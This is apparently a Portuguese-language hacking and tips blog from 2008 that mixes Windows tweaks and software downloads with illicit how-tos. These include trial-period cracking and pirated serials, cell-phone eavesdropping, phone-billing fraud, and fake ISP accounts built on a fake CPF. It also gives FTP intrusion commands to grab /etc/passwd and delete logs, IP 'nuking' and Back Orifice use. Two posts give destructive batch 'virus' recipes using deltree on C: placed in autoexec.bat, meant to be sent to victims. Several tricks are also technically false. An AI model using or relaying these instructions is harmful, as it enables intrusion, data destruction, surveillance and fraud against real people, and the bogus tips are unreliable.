Marque a 3 opcaum: "Ajustar para obter um melhor desempenho".

Se vc kiser tbm, pode sair de Efeitos Visuais> Desempenho> Avançado> e voltar para as "Propriedades do Sistema" e ativar as Atualizacoes Automáticas, que serve para corrigir alguns erros do Windows e atualiza-lo.

Reinicie o Computador, verá que soh issu fará grande diferença no seu Windows. ^^

Como ver quem te bloqueou no MSN

Se avc xa que aquele amigo num entra a muito tempo no msn, ou aquela mina lah que vc tava de olho nunk mais entro no msn, desconfie. Eles podem ter te bloqueado! Mas como saber quem te bloqueou? Simples:



* Logue no Msn.
* Vá em ferramentas, depois em opções.
* Depois na guia Privacidade.
* Onde aparece a lista de contatos, clique nos nicks com o botão direito do mouse.
* Se aparecer a opção Excluir, é porque esse infeliz te bloqueou. Se naum aparecer essa opção, relaxa que você ainda tem um amigo ;D

Como burlar programas com periodo de Evacuação

Trial Reset 3.0 RC9


Seria bom se você pudesse prolongar ou excluir o limite de teste de um programa shareware, né? Trial Reset 3.0 RC9 é um utilitário que remove e exclui as informações de uso e histórico de versões de avaliação de softwares de suporte ,que é gravado no Registro do Sistema, para estender (ou violar) o período de avaliação. Suporta todos os tipos de proteções. Muito bom msm. ;D

download

Como converter todos os tipos de Video


Total-Video Converter 3.11

Total Video Converter, converte todo o tipo de arquivos de vídeo: 3GP, MP4, PSP, iPod, SWF, FLV, DVD, VCD e AVI. Suporta a leitura e reprodução de qualquer formato de áudio e vídeo. Um ótimo recurso de Total Video Converter é o suporte completo a vários arquivos de vídeo em jogos. Quando pedir pra vc registrar eh soh colar o código de licença aki: http://www.scribd.com/doc/247869/total-video-converter-serial

Pode baixar, testei e aprovei! ^^
> DOWNLOAD <

Team Speak




Suas partidas online se tornam muito mais emocionantes com comunicação por voz. Converse apenas com o seu time, ou com todos os jogadores, desenvolvendo estratégias em segredo, divertindo-se com piadas e comentando ou dando dicas sobre o modo de jogo dos outros em campo.
TeamSpeak é sem dúvida o mais conhecido software desenvolvido para desempenhar essa função. O programa atua na barra de sistema (ao lado do relógio do Windows) permitindo que você e seus amigos se comuniquem através de voz, como numa conferência telefônica.

Download - 4shared

Tutorial de como criar e utilizar server de Team Speak.

Veja o Mundo inteiro direto do seu PC

Google Earth 4.3



O Google Earth, desde sua primeira versão, é o software que mais surpreende e inova. Todas as suas brilhantes ferramentas e recursos são desenvolvidos em níveis colossais, o que sem dúvida é um enorme desafio.
Com o Google Earth você pode tirar fotos, ver sua própria cidade, voar com aviões por sobre os lugares mais remotos da Terra, indicar pontos turísticos e comerciais em quase todas as cidades. Com certeza fale a pena conferi está nova versão.


Download

Transforme se XP em Vista




Para quem já cansou daquele visual padrão do seu Windows XP e procura um pacote que mude, de vez, o modo como você o vê diariamente, uma boa escolha é o Vista Inspirat Bricopack. Mais do que um simples tema atrativo, o pacote traz uma série de mudanças na aparência do seu sistema, incluindo ícones, papéis de parede e esquemas de janela exclusivos. "Ahh, eu prefiro instalar o Vista". Pois é, mas quem não quer ter dor de cabeça com falta de compatibilidade que tem no Vista, eh melhor ficar com esse pack!
É rápido de instalar, não causa nenhum tipo de dor de cabeça ao seu usuário, assim como desinstalando.

Download via Baixaki

Barras visuais do Windows Vista no seu XP

RocketDock



RocketDock é um programa similar ao ObjectDock. Ele serve para organizar e tornar mais fácil
a inicialização de softwares, pastas e qualquer outro aplicativo ou arquivo que você queira.
Este programa funciona como uma barra de inicialização que fica na sua área de trabalho exibindo o ícone dos programas de forma animada, bastando um clique do mouse para executá-los.
Ícones
A barra é completamente personalizável. Adicione e remova ícones, separadores e qualquer outra aplicação, com a função arrastar-e-soltar.
Visual
Possui um visual moderno, limpo e leve. Você pode deixá-lo transparente, mudar a fonte, alterar os ícones e a forma como eles são mostrados e animados. Possui diversas skins e cores.

Download

ObjectDock Plus



ObjectDock é um programa que permite que você organize seus atalhos e tarefas em execução substituindo a barra de ferramentas e o menu Iniciar do Windows, deixando tudo com um visual mais moderno e com ícones que mudam de tamanho quando você passa o mouse sobre eles.

Download

Como Rotiar ADSL

Tutorial para Modem ZTE. (Configuração PPPoE Router).

Para acessar configuração do modem, abra seu navegador e na
barra de endereço digite: 192.168.1.1 e tecle Enter.







A seguinte tela será apresentada:





Login: ZXDSL , Senha: ZXDSL. Clique em OK e teremos
a tela a seguir.





Clique na opção "QUICK SETUP".
A próxima tela será a seguinte



"VPI
e
VCI" (Virtual Path Identifier e Virtual Channel Identifier):
Camadas do protocolo de Internet, para identificação do canal e caminho de uso
de uma operadora. Insira os Valores de acordo com a Região e Cia. Telefônica.
Clique em Next, a próxima tela será a seguinte





Selecione o Protocolo "PPP over Ethernet (PPPoE)".
Encapsulação, selecione a opção "LLC/SNAP". Clique em
NEXT



Selecione a opção "Obtain an IP address automatically"
(obter um endereço de ip automaticamente). Marque a opção "Enable
NAT", clique em Next



Preencha os campos User Name e Password, com e-mail
e senha do provedor, selecione a opção "allways on".
Clique em next



Na tela acima, os campos da opção "LAN side IP Address"
são automáticamente preenchidos. Na opção "DHCP Server"
desmarque a opção "Enable DHCP server on the Lan". Ao
desmarcar a opção, a tela fica da seguinte maneira:







Clique em Next



Nesta tela temos o Resumo da configuração, basta clicar em
"Finish", o modem salva as configurações e faz o Reboot automaticamente.

Acelere sua Internet discada




Bom, ao caso de muitos usuarios da internet, ainda usam internet discada, como eu, ja cansado daquela internet de 50kbps?
pois bem, quer deixar sua internet para 115kbps! vá em:
Meu Computador > Propiedades > Hardware > Gerenciador de Despositivos > Modems
agora clique duas vezes no seu modem, no meu caso motorola, em "avançados", em codigos avançados digite > "AT & FX s11=50"
digite do mesmo jeito, seguindo as letras maiúsculas e minusculas.

Pronto! e so conectar, e sua Internet estará de 115kbps!
owend ;)

As Limitações do Speedy


O acesso via ADSL, oferecido pela Telefônica como Speedy, tem várias vantagens sobre ultrapassado acesso discado: é mais rápido, oferece conexão ininterrupta pagando-se apenas uma taxa mensal fixa, etc. etc. etc. Mas como nada é perfeito, o serviço também tem suas limitações, o objetivo deste artigo é justamente falar um pouco sobre elas, explicar o por que de cada uma e, por que não, ensinar como burlar algumas delas.



Conexão Instável

A maior reclamação dos usuários do Speedy vem sendo a instabilidade da conexão, que em muitos casos cai constantemente, obrigando a resetar o modem para que a conexão volte. Em alguns casos as quedas são esporádicas e não chegam a incomodar, mas existem casos em que a linha cai freqüentemente, de poucos em poucos minutos.

O grande problema neste caso é o trecho de fio entre a casa do assinante a central telefônica. No acesso via ADSL, temos dois modems ADSL, um na central e outro na casa do usuário, que mantém uma conexão contínua usando o cabo telefônico. O grande problema é que em muitos casos o cabo está deteriorado, e apesar de não oferecer problemas com as ligações de voz, compromete a velocidade da comunicação entre os modems e pode fazer com que a conexão caia com freqüência, devido à instabilidade do sinal.

Como resolver este problema? Normalmente existem vários cabos disponíveis em cada central, cabos sobressalentes já puxados, que podem ser usados em substituição de outro defeituoso. Existem também derivações nos cabos, que podem ser eliminadas para melhorar o sinal. Caso você esteja com o problema de desconexão, ligue para o 103 e peça a visita de um técnico da telefônica. Como neste caso o problema é com as instalações da Telefônica a visita não será cobrada. O técnico possui um aparelho que testa a velocidade da conexão com o modem da central, em geral eles consideram a linha como defeituosa caso a conexão esteja abaixo de 2 Mbps (isso não tem nada a ver com a sua velocidade de conexão, é a velocidade máxima que pode ser alcançada). Percebendo o defeito o técnico tentará justamente trocar o par de fios entre sua casa e a central, tirar derivações, etc. Nem sempre eles conseguem resolver o problema, mas pelo menos tentam. E qualquer forma, você pode acionar o serviço várias vezes até que consigam resolver o problema.



Portas bloqueadas

Outra limitação são as portas TCP bloqueadas pela Telefônica, que impedem "conexões entrantes", ou seja, tentam impedir que você monte um servidor de FTP ou transforme seu micro num servidor Web por exemplo. As portas bloqueadas são:

Porta 21, usada por servidores de FTP,

Porta 23, usada para acesso via Telnet

Porta 25, usada por servidores SMTP (servidor de e-mail)

Porta 80, usada para acesso via http, ou seja por servidores de páginas Web.

Portas 137 e 138: Compartilhamento de arquivos e impressoras (serve mais como uma medida de segurança para os usuários, já que muita gente acaba esquecendo o compartilhamento ativado, expondo-se a invasões).

Porta 1352: Usada para administração remota do Lotus notes.

Portas 1503 e 1720: Estas portas são usadas pelo NetMeeting para receber as chamadas. Com as portas bloqueadas, você pode chamar alguém para conversar, mas ninguém conseguirá chamá-lo.

Porta 5631: é usada para administração remota usando o PC Anywhere.

No caso dos servidores de FTP e Http é fácil burlar a limitação. Ao configurar seu servidor de FTP, mude a porta default (a 21 bloqueada) para outra porta qualquer, a 22 por exemplo. No caso do servidor de Http, novamente configure o programa para usar outra porta e não a 80 default, você pode usar por exemplo a 1080. Ao acessar a página, ao invés de digitar http://seuIP, digite http://seuIP:1080, isso orientará o navegador a acessar o servidor usando a porta 1080 ao invés da porta default, novamente burlando a limitação.

Existe também uma versão do Speedy destinada a empresas, o Speedy Business, onde estas portas estão desbloqueadas. O Business custa 20 reais a mais por mês.



Clonagem de endereços IP

Outro problema grave e que vem se tornando freqüente é a clonagem de endereços IP. No Speedy cada usuário ganha um IP fixo que é dado pelo provedor de acesso. O grande problema é que não existe nenhum tipo de autenticação por senha ou por qualquer meio. Qualquer um que tenha o Speedy instalado pode usar qualquer IP da sua área, tendo apenas o trabalho de mudar o endereço nas configurações de rede. Dois micros não podem acessar usando o mesmo endereço IP, por isso caso um dos engraçadinhos resolva usar o mesmo endereço que você, novamente a sua conexão vai cair sempre que ele ativar a rede. Neste caso, a conexão não vai voltar resetando o modem, mas apenas desativando e reativando a conexão de rede no Windows, ou então resetando o micro.

A solução é ligar para o provedor, explicar o que está acontecendo e pedir que troquem seu endereço IP. Eles tem como rastrear quem clonou o primeiro endereço e tomar providências.



Compartilhamento da conexão

Usando o Speedy você tem apenas um endereço IP, mas claro, isto não significa que você não possa compartilhar a conexão usando o Internet Conection Sharing, ou então um servidor proxy qualquer, assim como faria para compartilhar uma conexão via modem.

Neste caso, o micro onde o modem ADSL está instalado deve ter duas placas de rede, uma para o modem e outra para a rede interna, por onde se comunicará com os demais micros. A desvantagem neste caso é que o micro principal terá que ficar ligado 24h, caso contrário os demais perderão o acesso quando ele for desligado.

Mas, uma surpresa é que dependendo do modelo de modem que está sendo usado, você pode usar o próprio modem ADSL para compartilhar a conexão, usando o NAT, ou até mesmo via DHCP. Se você estiver usando um modem Alcatel Speedy Touch Pro por exemplo, experimente mudar o seu endereço IP nas configurações de rede para "10.0.0.139", reinicie o micro, ative a conexão, abra o navegado e digite o endereço http://10.0.0.138. Você acaba de abrir a página de configuração do modem :-)

Este modelo de modem em especial é extremamente poderoso, pode servir até mesmo como um servidor DHCP, você pode pesquisar os recursos consultando o manual, que pode ser baixado em http://velocidade_justa.vila.bol.com.br/manuais.htm

Outra opção é comprar um Hub, ligar os micros em rede usando o hub, e ligar o modem a ele, usando a porta "Up-Link", a porta que normalmente é usada para conectar um hub ao outro. Não se esqueça de usar um cabo cross-over.

Você pode fazer várias assinaturas do provedor de acesso, ganhando assim um IP para cada micro que irá se conectar. A surpresa é que usando este sistema, todos os micros poderão conectar-se ao mesmo tempo, cada um com seu endereço IP, usando apenas UM modem e uma linha.

A velocidade de conexão normalmente vai ficar limitada a cerca de 2 Mbps, que é a velocidade média de comunicação do modem ADSL, de qualquer forma, já é suficiente para pelo menos 8 conexão de 256kb.

quarta-feira, 14 de maio de 2008

Encontrando um IP

Ultimamente nas salas de bate-papo (chats), ouve-se muitos "lamerzinhos" de merda fazendo ameaças a usuários comuns do tipo: "Vou rastrear seu ip... e depois viu te nunkar". Arghhh!! eu não agüento ler estas mensagens, principalmente vindo de lamers. Por isso que resolvi escrever este texto para usuários aprendam a se denfeder de lamers.
Para começar eu quero lembrar que hoje em dia os chats mais modernos, tem um esquema de segurança muito bom como: Filtro de comandos HTML e travas de scripts, com isso não é em todo chat que estas dicas vão funcionar...

.
1-) Rastrear Ip em salas que não aceitam comandos de HTML
.
No windows existe um programa chamado ARP, este programa é o 1º passo rastrear um IP. Como usar:
.
Espere a vitíma lhe mandar um Msg e depois vá até o prompt do MS-DOS e digite :
ARP -A
.
Será listado todos os IPs que lhe mandaram mensagens.
.
2-) Rastrear IP em salas que aceitam comandos de HTML

Tente fazer assim....
A ultima pessoa que vc conversou vai se a ultima a apareçe...

Usem com moderação

4 maneiras de rastrear chamadas de celular

Fazendo escuta clandestina em telefones celulares.

Aviso: Escuta clandestina é um crime previsto por lei e da cana! Por isso aprenda a correr seus riscos, eu não me responsabilizo por nemhum de seus atos.

Ultilizando aparelhos motorola.

Primeiro tire a bateria do seu celular , depois de abrir o celular ira ter umas partes de metal embaixo do celular ,Três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal ,depois bote a bateria ,e ligue o celular, ira acontecer umas coisas , digite #1008# e depois de digitar o numero é só ouvir as conversas telefônicas.

Ultilizando aparelhos Ericson.

1 - Pressione a tecla FCN e com ela pressionada apertar os números 90- 40- 59.
2 - Solte a tecla FCN. Deverá aparecer na tela a mensagem TESTE INPUT.
3 – Aperte então 1 * 1 # 01 # #.
4 - Pronto, você entrou no canal 01, para ir mudando de canais basta ir apertando a tecla de volume até achar alguma conversa interessante.
5 - Para tirar do modo de escuta, você deve retirar a bateria do celular.

Ultilizando aparelhos de televisão.

Este texto contém informações consideráveis que ensinam como fazer escuta celular
via TV(pode se necessário usar o manual da TV). Nos avisamos que fazer escuta
celular é ilegal de acordo com a ECPA, e estas informações são exclusivamente para
uso e propósito educacional não nos responsabilizamos pelo mal uso das
informações aqui contidas. TV VHF canais 70 - 83 pegue a melhor distribuição do
melhor tronco usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer
a escuta. Cada canal da TV obrigara 5Mhz com ótimo controle de sintonia. Se
mesmo assim você não tiver uma freqüência exata você precisará ler sobre
freqüência e você terá uma boa idéia de como obter uma exata. Se a sensibilidade não
estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você
pegara alguma coisa. Você poderá também pegar transmissões de negócios no
tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a
menos que a conversa esteja codificada então você poderá usar a velha TV para
achar outro local de negócios que use freqüências entre 800Mhz ou mais.

Ultilizando um rádio comum.

Os telefones em questão, são telefones sem fio. Eles transmitem suas ondas por
FM. Sendo assim, o que você tem que fazer é descobrir a freqüência. Mas, tem as
suas restrições. À não ser que seja um rádio com uma antena muito forte, ele tem
que ficar perto da base do telefone. Uma freqüência que descobri é 93,9MHz, mas
não quer dizer que todas sejam assim. E não é ligar apenas ligar o rádio e escutar.
Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto
exato, você poderá escutar perfeitamente.

Ligações Internacionais Gratuitas

Quando você vai fazer uma ligação internacional, você já fica cagado com medo da conta telefônica, mas existem vários meios de se burlar a fraquinha segurança das centrais da Embratel. Primeiramente eu vou explicar como funciona as centrais da Embratel: Quando você digita os primeiros três número, ( por ex. 027 ) a central vai verificar se existe um código desta cidade, para enviar a ligação para a central rolante mais próxima, e depois da ligação completada começar a tarifação. A mesma coisa acontece quando você vai fazer uma ligação internacional, só ,que no caso a central vai verificar os primeiros dois número (ex. 08 - USA), bem agora chega de bla, bla, blla e vamos a que interessa.
Na hora de fazer a ligação você deve confundir a central, digitando "00", porra! mas como?

É simples, o primeiro 0 é um procedimento normal, já o segundo via fazer a central desvia a atenção para procurar o código do país "00", é ai que vc vai digitar rapidamente o código do país que você deseja ligar, no caso EUA que é "08", caso a Embratel não tenha sido mais rápida que você e não tenha dado nenhuma mensagem, você pode digitar normalmente o número do telefone.

Como gastar menos com celular

Para fazer uma ligação gastando a metade do preço é muito simples, pegue o número a ser discado no nosso exemplo seria 982-5567. Dai você pega o último dígito, no nosso caso é "7" e subitrai de 10. Então "10 - 7 = 3", dai é só adicionar ao número inicial do telefone.
O resultado daria : 982-55673.
Mas se o ultimo dígito for "0", Fudeu? Não! Dai é mais simples, é só você adicionar zero ao final do número.
Ex: Telefone : 982-8790. Logo teremos: 982-87900. Simples não ?

Provedor UOL de Banda Large grátis

Primeiro entre na pagina da UOL(http://www.uol.com.br), se você nao usar o UOL, aparecerá uma tela para você se cadastrar, ai você clica na sua cidade e irá aparecer a tela de cadastro, ai
você preenche todas as informações(com dados falsos, claro), bom ai vem a parte ilegal, você vai
precisar usar um CPF falso(você estará infringindo a lei, por tanto use com cuidado), para
arranjar um CPF falso você pode pegar um gerador de números de CPF em
http://www.terravista.ciclone.com.br/Ipanema/1089, na área de downloads(esse gerador foi criado
por mim, hehehehehe), depois de gerar o numero(ex. 123.123.123 - 87), você coloca ele no lugar do CPF, depois, vc preenche tudo com dados falsos, ai vem a forma de pagamento, vc deve selecionar o pagamento com debito em conta telefônica, depois de selecionar essa opção coloque o numero de telefone que vc quer q seja cobrado(invente um numero aleatório ou olhe na lista telefônica), não precisa preencher nada no numero de cartão de credito, se vc preencher ai vc tah ACABADO, depois eh soh clicar em enviar e Tadaaaaaaaaah!!!, vc criou uma conta falsa!! Espero que vc saiba usar essas informações, pois elas são apenas para o aprendizado se vc se der mau lembre-se nunca viu esse texto antes!!

Invasão Por FTP 2 parte Oque é cavalo de troia!!!



Documento sem título




Invasão Por FTP


Cavalo de tróia


Para começar vamos definir o que é cavalo de tróia. Cavalo
de tróia nada mais é do que um programa que emula o layout de
um sistema para capturar senhas ou outras informações.

Geralmente o hacker passa o programa como se fosse uma mensagem (e-mail) ou "joguinho" novo
para o usuário que deseja invadir. Quando o usuário acessa o
cavalo de tróia este grava os dados e se conecta com seu criador, este
tipo de ataque só é viável para hackers que tem um ótimo
conhecimento em java e C+ +, e outras linguagens que oferecem ferramentas de
comunicação remota.


Farejamento de redes


Para acelerar a sua transmissão, os dados que entram nas redes, provenientes
de vários computadores, são agrupados em pacotes. O hacker cria
programas farejadores que monitoram a circulação desses pacotes
nas redes e procuram neles palavras como password e senha. Quando encontra,
o programa copia o pacote e o envia para o computador do hacker. Os dados chegam
codificados, mas isso não é problema para ele, que, em geral
conhece bem criptografia, o conjunto de técnicas que permite codificar
dados.


Investigação Social


É muito comum que usuários poucos experientes usem como sua
senha de acesso o nome dos filhos, da mulher, a data de aniversário
dele ou da esposa, ou alguma coisa relacionada com sua vida pessoal.


Programas invasores


É uma técnica muito usada no Brasil, onde as senhas na maioria
da vezes tem 6 caracteres e não são muito complicadas. O programa
invasor é um sistema que monta inúmeras combinações
de caracteres e números, até chegar a senha do usuário.
Mas a coisa não é tão simples assim, para o hacker fazer
um ataque deste tipo, ele nunca deve fazer de sua conta oficial e de sua casa.
O certo é fazer de um notebook, num telefone público de preferência
longe de sua residência e com intervalo de tempo longo, como 2 dias para
cada ataque, assim não se levanta suspeita.


Invadir um servidor via FTP


O hacker pode invadir um servidor de uma provedora via FTP e roubar o arquivo
de senha do servidor. geralmente o nome do arquivo é "passwd" ou "logs",
também é válido lembrar que estes arquivos vem criptografados,
dai você vai precisar de uma ferramente que descriptografe o arquivo,
(esta ferramenta á fácil encontrada na internet) lembrando que
não é 100% eficiente.

Obs. tome muito cuidado quando for invadir um servidor para roubar um arquivo
de senhas, porque se te rastrearem, você tá fudido até sua
5º geração, é cadeia na certa, e se você for
de menor quem vai se fuder vão ser seus pais, por isso pense antes de
sair por ai invadindo servidores de provedoras.


Dedução


É realmente a técnica mais utilizada por hackers experientes,
o hacker usa a lógica para quebrar a senha, contando com 3 dados fundamentais.


1 - Muitos usuários usam o login como senha ex. (login: peixe senha:
peixe)

2 - Muitos administradores usam a senha padrão do sistema.

3 - A maioria das senhas estão relacionadas com login ex. (login. Kurt
senha: Cobain)


Invadindo um F.T.P


Para Hackear um Servidor FTP, Primeiro vc deve saber o indereço do
Host ou seu IP, para

isto use o IPSCAN, digitando o IP Principal do Host:

.


Lista de Alguns FTP's:


ftp.mandic.com.br



ftp.bestway.com.br



ftp.internetclub.com.br



ftp.netscape.com



ftp.angelfire.com


Existem vários Programas de FTP'S, se não quizer saber de ftp
porra nehuma use o do DOS.

Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir
um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.

Ao conectar ele pedirá a senha e o Password, tente user os passwords
UNIX, se não der vc

deve entrar INVISIVEL !

Como entrar invisível ?

No login precione ENTER, no password precione Novamente...

Ira aparecer o prompt ftp> novamente...., ai é só digitar...

quote user ftp , precione ENTER e digite:

quote cwd ~root

Precione ENTER novamente e digite:

quote pass ftp

Pronto, vc esta Hackeando...

Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não
esta

Hackeando.., pois esta aplicada a proteção..., para isto tente
com outro user tipo quote cwd

~sys e os outros da lista UNIX....

Não tente Hackear usando o user normal de FTP'S, que é login
: anonymous e password: seu

E-Mail, pois vai ser aplicado a proteção....

Ao entrar vc vai estar no Diretório do login, tipo \home\root\,

Dai, para ver a lista de users vc volta um dir vá para o dir \home\

e cada dir é um usuário,... não tentem pegar as senhas
, pois são Cryptografadas...

Pois a maioria dos users usa a mesma senha login....

Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no
MS-DOS, digite ? e

tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear
!!!

Não fique mais que 5 Min em um servidor, pois ele caçara seu
IP, e seu login, e vai ser

CADEIA !!!


Obs: NUNCA APAGUE NADA!






Como invadir por FTP







Documento sem título




Muito fácil também, você só precisa de um provedor
antigo, para que tudo funcione bem...

Va ao prompt do DOS e digite ftp, depois de open. Depois siga os passos


1- ftp.windoze95.com ou outro servidor de ftp que vc quiser.


2-o servidor vai perguntar o seu username, pressione enter


3-o servidor vai perguntar pelo password, pressione enter


4-e no prompt escreva:


quote user ftp


e depois..


quote cwd ~root


e depois..


quote pass ftp




Faca isto para deletar o arquivo de log, assim o adiministrador do sistema
não sabera quem acessou e não vera voce.


Obs: Se dizer na sua entrada "acess restriction apply" pode esquecer
que não será possível acessar o arquivo de senhas.


1-Digite cd\etc e digite get passwd


Se você tiver feito tudo isso corretamente e se o servidor tiver

um simples e antigo sistema de seguranca tudo ocorrera bem.

Você vai ter um root access.

Para quem é lammer e não sabe, root acess é o maior status
de seguranca que voce pode ter.


OBS: Isso so vai funcionar em servidores antigos como os que as universidades
usam.


Todo caso se vc não conseguir tem outra forma, entre no user como anonymous
e daí ele pedirá teu e-mail, daí se bota uma besteira
tipo silvio.santos@sbt.com.br daí é só entrar no diretório
etc e pegar o password. Na maioria das vezes as senhas estão criptografadas
use o crackjack e uma word list para desincriptografa-la.




Eu não se responsabilizo por qualquer ato cometido através disto
se pegarem você é problema seu!!!





domingo, 11 de maio de 2008

Descobrindo o poder do Ms-dos


Bom meus queridos vizitantes hj nessa tarde de Domingo dia 11 nós tomamos coragem e atualizamos o site com algumas coisas novas do vosso interesse quero que vc si divirta-se quebrando a proteção de alguns modens atráves do Ms de comando



Invadindo por IP-TCP




Todo mundo que tem o ms-dos instalado em seu computador, por isso, quase todo
mundo,

não sabe que tem um potente rastreador de endereço IP em sua
máquina.

Mas antes de tudo o que é endereço ip? Endereço IP é um
número que você recebe na

hora em que conecta ao seu servidor. Um exemplo de endereço IP é 200.200.200.200.
Os

três primeiros números representam o D.N.S. de seu servidor, e
o último o número que

varia. No Brasil, todos os IPs começam com 200.

Para rastrear você deve usar um programa chamado arp, que faz parte do
ms-dos. O

comando que deve ser digitado é arp -a. Você verá uma lista
de endereços IP. Mas como

saber qual é o IP da pessoa? Você deve ter certeza de que a última
informação que

chegou no seu modem veio da pessoa que você quer descobrir o IP, e daí entrar
com o

comando no prompt do ms-dos. O IP da pessoa será o primeiro.

Também existem outros programas como o netstat. Com ele você pode
rastrear qual é o

servidor da pessoa e outros. Mas esse programa é mais complicado, se
você quer saber

como usá-lo digite netstat -h , e a tela de ajuda aparece.

O que fazer com o endereço IP? Você pode nukar a pessoa. O nuke é um
programa que

envia uma mensagem de erro a porta 139, fazendo a conexão da vítima
cair. Você também

pode invadir o computador da pessoa usando o Back Orifice ou outro programa.



Cuidado, seu host e seu ip foram rastreados:



Hackers terão concurso para invadir laptops com Mac OS X, Linux e Vista

Vancouver – Concurso “PWN 2 OWN” dará US$ 20 mil para
primeiro hacker que invadir laptops com Windows, Mac OS ou Linux com ataque inédito.

Quem é o mais seguro: Linux, Mac OS X ou Vista? É isto que os organizadores
da conferência de segurança CanSecWest pretende descobrir nesta
semana com um concurso de hacking em Vancouver.

Os participantes terão que usar um ataque ainda sem correção
e inédito e quem conseguir invadir o sistema, seja ele Windows, Mac
OS X ou Linux, ganhará 20 mil dólares e ganhará o laptop
usado no ataque.


O concurso será chamado de “PWN 2 OWN”, frase que, na terminologia
hacker significa “invada para ganhar”.


Por mais que o preço pareça muito dinheiro, participantes afirmam
que um ataque inédito, como o que o concurso exige, pode render muito
mais dinheiro em tempo menor, pela venda da tecnologia seja para fabricantes
de segurança ou para agências ligadas ao governo dos Estados Unidos.


Charlie Miller, mais conhecido como um dos pesquisadores da Independent Security
Evaluators que hackeou o iPhone no último ano, afirmou que vai participar
não pelo prêmio, mas pela emoção de ver se consegue
ser o primeiro a invadir o sistema. "Para mim, este é o Super Bowl
da pesquisa de segurança", afirmou.


No primeiro dia do concurso, ninguém ainda tinha tentado invadir os
três laptops. Isto não é basicamente uma surpresa já que,
no primeiro dia, os organizadores permitiram apenas ataques usando funções
de rede que não exigem interação do usuário, ameaça
bastante rara ultimamente.


Miller afirma que tentará invadir o MacBook Air na quinta-feira quando
as regras serão menos rígidas e os hackers poderão tentar
ataques que permitem a ação do usuário, como visita a
um site malicioso ou a abertura de uma mensagem eletrônica.


Existe um problema em esperar até quinta, porém. O prêmio
cai pela metade a cada dia. Caso a invasão não tenha sido realizada
até sexta, o prêmio cai para 5 mil dólares e os organizadores
instalarão programas na máquina para facilitar invasões.


No ano passado, o concurso gerou muita atenção, mas tinha apenas
um laptop MacBook Pro, invadido pelo pesquisador Dino Dai Zovi.

Modo de Criação de Virus



Criando Virus







Em primeiro lugar, você deve abrir o MS-DOS e seguir o proximos passos....Digit: Edit(nome do seu arquivo).bat, deverá aparecer uma tela azul.Entre com os comandos: @ECHO OFF e BREAK OFF.A página deverá ficar da seguinte maneira



@ECHO OFF
BREAK OFF



Depois disso, a pessoa escolhe o que seu vírus deve fazer.Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá certeza de estar executando seu vírus ao iniciar o computador-alvo.Agora vamos supor que o seu vírus seja capaz de apagar todos arquivos do PC alheio.Você deve usar o seguinte comando:



deltree/y c:\*.*



Agora, o vírus simples da pessoa está completo.É só a vítima (seu amiguinho) executar o arquivo e pronto!!!



Importante:



Caso a pessoa passe esse vírus via disquete, ele não deve esquecer de finalizar o arquivo com o comando deltree/y a:\*.* .Isso serve para não deixar vestígios de seu ato insano.

Criando Virus 2



Para fazer um virus existem muitas plataformas e varios tipos de virus existe virus tipo *.bat*.exe*.mid*.sis*.dll*.etc....tem todas as formas que você possa imaginar para criar um virus do tipo melissa ou I love you não basta 5 minutos e semanas ou até mesmo meses para adicionar suas configurações e o que ele ira causar as vitimas como se espalhar pelo computador ou se camuflar em outros executaveis ou até mesmo no momento se espalhar por toda sua lista de contatos e enviar varias copias dele mesmo para e-mails de amigos e qualquer pessoa que estiver na sua lista de contato.Os virus mais fracos os chamados *.bat ou mais conhecidos como virus batch são criados em minutos basta ter a formula isso você encontra você pega uma formula seja de um virus pra excluir o windows ou para enviar erros ao modem tanto faz sempre quando você mesmo criar uj batch nunca eu falei NUNCA rode ele no seu proprio HD para ver se funciona ou não prefira sempre os micros da escola ou mande para algum lamer (ou como preferir LAMER ou COBRA).Quer editar seu virus*.bat agora?então vamos lá clique no menu iniciar vá até programas em seguida aponte para acessórios e abra o arquivo NotePad ou WordPad lá você digita isso exatamente como esta aqui:


@ECHO OFF
BREAK OFF
deltree/C: Y\*.*



A: nome do virus.bat autoexec.bat
Em seguida salve esse arquivo assim: Nome do virus.bat
Pronto agora você tem um virus.bat no seu proprio micro nossa!!!!que emoção não sei se vou conseguir digitar mais(chega de brincadeira) Agora de maneira nenhuma mesmo se desconfiar que esse virus está errado não abra esse arquivo então é só isso você agora já tem mais ou menos uma noção do que é um virus.bat e um .exe

Você sabe o que são Vírus?






Neste post vamos abordar um dos mais famosos malwares, os vírus



Neste post vamos abordar um dos mais famosos malwares, os vírus: você sem
dúvida já ouviu falar deles, mas será que todos sabemos
como eles funcionam e como podemos evitar que nossos computadores sejam infectados?



Os vírus de computador recebem este nome devido a sua semelhança
com os vírus biológicos. Da mesma maneira que um vírus
biológico entra em um organismo e o infecta, multiplicando-se e posteriormente
espalhando-se, um vírus de computador tem por finalidade invadir um
computador a fim de deixá-lo “doente”. Os principais danos
causados à maquina são: redução do desempenho,
perda de dados, acesso invasivo a informações pessoais e desconfiguração
do sistema operacional em casos mais sérios.



Outra característica intrínseca aos vírus é a
necessidade de um hospedeiro. Os hospedeiros mais comuns são os arquivos
executáveis, que acabam se propagando por anexos em emails, mensageiros
instantâneos e web sites. Para que um vírus se instale no seu
computador é necessário que você abra o arquivo executável
no qual ele está hospedado ou abra o anexo de email infectado, entretanto,
se o aplicativo for bem elaborado, poderá se instalar sem que você perceba.



A fim de proteger seu computador dos tão temidos vírus, você precisa
estar sempre atento aos sites que visita e principalmente aos arquivos que
baixa. Preocupado com a sua segurança, o Baixaki adotou o princípio
de testar todos os programas adicionados ao site, para evitar que nossos usuários
sejam contaminados. Entretanto, a maioria dos sites não têm esse
cuidado, disponibilizando muitas vezes conteúdo perigoso.



Os programas antivírus são essenciais para quem precisa limpar
computadores possivelmente infectados, mas também para quem quer estar
seguro. Principalmente aqueles que possuem informações importantes
ou utilizam serviços de banco pelo computador não podem se descuidar,
abrindo brechas para este tipo de ameaça.